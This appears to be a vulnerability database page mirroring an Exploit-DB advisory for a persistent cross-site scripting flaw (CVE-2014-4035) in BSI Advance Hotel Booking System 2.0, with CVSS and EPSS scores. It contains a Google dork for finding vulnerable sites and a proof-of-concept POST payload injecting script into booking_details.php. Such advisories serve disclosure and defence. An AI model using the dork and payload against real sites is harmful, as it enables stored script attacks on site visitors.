Lucene search
Angelo RuwanthaEDB-ID:47219HistoryAug 12, 2019 - 12:00 a.m.
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
2019-08-1200:00:00
Angelo Ruwantha
www.exploit-db.com
150
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
7 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
57.5%
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)Related
prion
prion
Cross site scripting
2014-06-11 14:55:00
cvelist
cvelist
CVE-2014-4035
2014-06-11 14:00:00
cve
cve
CVE-2014-4035
2014-06-11 14:55:10
zdt
zdt
nvd
nvd
CVE-2014-4035
2014-06-11 14:55:10
packetstorm
packetstorm
BSI Advance Hotel Booking System 2.0 Cross Site Scripting
2019-08-12 00:00:00
exploitpack
exploitpack
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
7 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
57.5%
Related for EDB-ID:47219